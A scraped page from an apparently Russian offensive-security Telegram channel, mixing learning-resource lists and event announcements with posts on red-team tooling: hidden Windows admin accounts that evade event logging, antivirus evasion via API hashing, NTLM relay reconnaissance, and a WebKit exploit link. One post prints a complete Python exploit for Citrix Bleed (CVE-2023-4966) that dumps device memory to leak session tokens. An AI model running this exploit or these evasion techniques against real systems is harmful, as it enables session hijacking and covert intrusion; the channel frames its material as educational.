Похек
16.6K subscribers
2.1K photos
110 videos
243 files
3.07K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
Всем спасибо, что были со мной эти 2 года. Всем новым, кто только присоединился предлагаю позвать своих коллег сюда. Гарантирую, будет интересно 😎
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥38👍6
⚡️ Подборка ресурсов для изучения кибербеза
#подборка #awesome

➡️ Меня довольно часто спрашивают, что где почитать, где практиковаться, как начать зарабатывать. Считаю я закрыл данные вопросы надолго.

1️⃣ Видео
John Hammond
STÖK
LiveOverflow
The XSS rat
Sathvik Techtuber
Guided Hacking
NetworkChuck
Grant Collins
Positive Events
OFFZONE MOSCOW
PwnFunction
DEFCONConference
David Bombal

2️⃣ Теория
HackTricks
PayloadsAllTheThings
Xakep
Poxek
PortSwigger
SecurityLab
Codeby
Awesome DevSecOps
iOS Security Awesome
Android Security Awesome
Personal Security Checklist
RedTeam Tools
OWASP Cheat Sheet Series
six2dez pentest-book
Awesome Bugbounty Writeups
Blog INTIGRITI
PentesterLand Writeups
Pentesting AD mindmap
Conference slides

3️⃣ Практика
TryHackMe
HackTheBox
VulnHub
GoAD
Exploit-DB
PortSwigger Academy
bWAPP
WebGoat
OWASP Juice Shop
FVWA
Root-Me
OverTheWire
Crackmes
Atomic Red Team
Codeby Games
Standoff КиберПолигон

4️⃣ Заработок
HH
Хабр Карьера
BI.ZONE Bug Bounty
StandOff Bug Bounty
Yandex Bug Bounty
BUG BOUNTY RU

➡️ Также вы можете пользоваться различными нейросетями, но учитывайте, что ответы не всегда могут быть правдивые.

➡️ @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
👍52❤‍🔥131262🔥2💔1🫡1
Обращение к менеджерам и коллегам администраторам других телеграм каналов.
Коллеги, давайте не воровать друг у друга посты, либо оставляйте какое-то указание источника. Я стараюсь не конфликтовать в медиа-сфере и решать вопросы на словах.

Спасибо тем подписчикам, кто сообщил о сложившейся ситуации 🤍
23👍5🌚1🎄1
⚡️ Создаём "невидимые" аккаунты на Windows с помощью Suborner
#windows #redteam

Главные функции:
1️⃣ Создавайте невидимые локальные учетные записи без использования команды net user или user management приложений Windows (например, netapi32::netuseradd).

2️⃣ Подходит для всех машин Windows NT (от Windows XP до 11, от Windows Server 2003 до 2022).

3️⃣ Осуществляйте подмену идентификатора путем использования техники RID Hijacking для любой существующей учетной записи (активной или отключенной) после успешной аутентификации.

4️⃣ Создавайте невидимую учетную запись компьютера с административными привилегиями, обходя Event Logger Windows, который фиксирует создание учетной записи!

💻 Github repo

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16🆒21
Love Pentest is...
👍2312💘8🆒2❤‍🔥1
Forwarded from Standoff 365
🔎 Хотите тоже оказаться в поисковой выдаче Яндекса по запросу «багбаунти»?

Есть простой способ: выступите 24–25 ноября на митапе Standoff Talks, где соберутся элита российского багбаунти и легенды практической безопасности.

🔥 Специально для вас мы решили увеличить количество выступлений и по этому поводу продлеваем call for papers до 27 октября.

Ждем докладов о пентесте и red team, багбаунти, участии в Standoff, онлайн-киберучениях, OSINT или на любую другую интересную тему в сфере практической кибербезопасности.

Все подробности и форма подачи заявки — здесь: https://cfp.standoff365.com/talks/cfp
Please open Telegram to view this post
VIEW IN TELEGRAM
🎉71🌚1
Forwarded from Код Дурова
👋 Вот это хорошо //

В бета-версии 4.10.4 Beta приложения Telegram Desktop у администраторов появилась возможность работать со статистикой каналов и групп.

Добавлены и другие важные нововведения:

— Например, можно быстро менять настройки пересылки по нажатию правой кнопки мыши на панель над полем ввода.

— Теперь есть визуально красивые блоки с кодом с подсветкой синтаксиса, их можно копировать по щелчку на заголовки блоков.

— Блок с моноширинным текстом и с подсветкой кода на выбранном языке программирования можно копировать при помощи синтаксиса ```language.

— Сочетание клавиш Ctrl+Space позволяет открывать меню проверки орфографии.

@d_code
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10👍1
Forwarded from Just Security
Мало кто знает, но в Awillix люди почти не попадают с улицы или «по объявлению», у всех есть история личного знакомства или его интересных обстоятельств. Так, например, Сережа aka @poxek подошел к нам на форуме после выступления с рядом интересных вопросов по теме.
«Такой молодой, а такой прокаченный парень» — подумали мы. Запомнили. А через время позвали в команду.

Его пример другим наука, как с помощью проактивности и упорства нестись по карьерной лестнице, обгоняя сверстников, получать разные бенефиты и полезные знакомства и успевать вести дюжину собственных проектов. Об этом он и дал интервью, спешите вдохновляться!
🔥22❤‍🔥6👍4🥰31🫡1💘1
This media is not supported in your browser
VIEW IN TELEGRAM
🦠 Веселые хеши. Реализуем технику API Hashing, чтобы обдурить антивирус
#AVbypass #xakep

В этой статье мы с тобой напишем пол­ноцен­ную пер­мутиру­ющую реали­зацию тех­ники API Hashing, что поз­волит раз и нав­сегда скрыть импорты от глаз анти­виру­са. Впер­вые тех­нику API Hashing я уви­дел в вирусе‑шиф­роваль­щике Revil, проб­лема лишь в том, что хеши от фун­кций были впи­саны в код, а это поз­воля­ет лег­ко соз­давать сиг­натуры. Давай сде­лаем так, что­бы все дан­ные генери­рова­лись на лету, тог­да у анти­виру­са не будет шан­сов!

➡️ Статья на Xakep

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
8👍5👀1
This media is not supported in your browser
VIEW IN TELEGRAM
😉 BloodHound. Натаскиваем ищейку на поиск NTLM Relay
#bloodhound #xakep

Преж­де чем при­менять тех­нику NTLM Relay, необ­ходимо соб­рать информа­цию об иссле­дуемом объ­екте и выб­рать пер­вооче­ред­ные цели. Но как это сде­лать, если ата­куемая сеть нас­читыва­ет мно­гие десят­ки или сот­ни узлов? На помощь при­дет очень полез­ный и удоб­ный инс­тру­мент — BloodHound!

➡️ Статья на Xakep

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥6
Forwarded from Волосатый бублик
#cisco #cve #webshell #scanner #blueteam

[ Cisco IOS XE Device Scanner for CVE-2023-20198 & CVE-2023-20273 ]

Webshell fingerprinting scanner designed to identify implants on Cisco IOS XE WebUI's affected by CVE-2023-20198 and CVE-2023-20273. 

Important! This is not a POC for exploitation. This is a OSINT/Blue Team/Research tool.

Author: Shadow0ps

https://github.com/Shadow0ps/CVE-2023-20198-Scanner
👍5
This media is not supported in your browser
VIEW IN TELEGRAM
Эксплойт для Citrix Bleed: Leaking Session Tokens
CVE-2023-4966

Пользуйтесь на здоровье 😉
Exploit:
#!/usr/bin/env python3

import sys
import requests
import urllib3
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

parser = argparse.ArgumentParser()
parser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)')
args = parser.parse_args()

if args.target is None:
print('Target must be provided (e.g. --target 192.168.1.200)')
sys.exit(0)

hostname = args.target

if __name__ == "__main__":
headers = {
"Host": "a"*24576
}
r = requests.get(f"https://{hostname}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)
if r.status_code == 200:
print("--- Dumped Memory ---")
print(r.text[131050:])
print("--- End ---")
else:
print("Could not dump memory")


Использование:
python exploit.py --target TARGET

💻 Github

➡️ Исследование

📹 YouTube PoC

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
👍81
Forwarded from Standoff 365
This media is not supported in your browser
VIEW IN TELEGRAM
🤩 Как попасть на самый прекрасный митап этой осени — Standoff Talks, где лучшие профессионалы offensive и defensive security обменяются опытом с активным комьюнити?

Все просто: нужно быть матерым спецом по ИБ (уверены, в нашем канале только такие) и оставить заявку на сайте.

А 24–25 ноября встретиться в Кибердоме в рамках Moscow Hacking Week, чтобы прокачать свои скилы в багхантинге и пентесте, да и в целом круто провести время.

Не забудьте рассказать о себе в заявке и поторопитесь — количество мест ограничено.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🆒1
Похек
😉 BloodHound. Натаскиваем ищейку на поиск NTLM Relay #bloodhound #xakep Преж­де чем при­менять тех­нику NTLM Relay, необ­ходимо соб­рать информа­цию об иссле­дуемом объ­екте и выб­рать пер­вооче­ред­ные цели. Но как это сде­лать, если ата­куемая сеть нас­читыва­ет…
This media is not supported in your browser
VIEW IN TELEGRAM
🐧 Microsoft отказывается от NTLM в пользу Kerberos

Компания Microsoft анонсировала, что в будущем NTLM (New Technology LAN Manager) будет отключен в Windows 11, поскольку компания переходит на альтернативные методы аутентификации и повышения безопасности. Теперь основной упор будет сделан на усиление протокола Kerberos.

➡️ Новость на Xakep

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥13
💊 Регистрация на Standoff 101 от Positive Technologies
Мероприятие для тех, кто хочет попасть в кибербез, но не знает, с чего начать

📌 Даты: 18–19 ноября

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
👍82
😵 Регистрация на Standoff Talks от Positive Technologies
Место для общения и обмена опытом профи и энтузиастов ИБ

📌 Даты: 24-25 ноября

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9
This media is not supported in your browser
VIEW IN TELEGRAM
🍏 Эксплойт для CVE-2023-41993
Apple WebKit Arbitrary Code Execution

Затронутые версии: WebKitGTK и WPE WebKit до версии 2.42.1.
Импакт: Обработка веб-контента может привести к выполнению произвольного кода.

⚡️ Ссылка на PoC
Переходите по ссылке, только если вы уверены, что ваше яблочное устройство обновлено до последней версии или у вас Android.

1️⃣ Ссылка на эксплойт с объяснением принципа его эксплуатации

2️⃣ Бекап репозиторий

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
😎92👍2💔2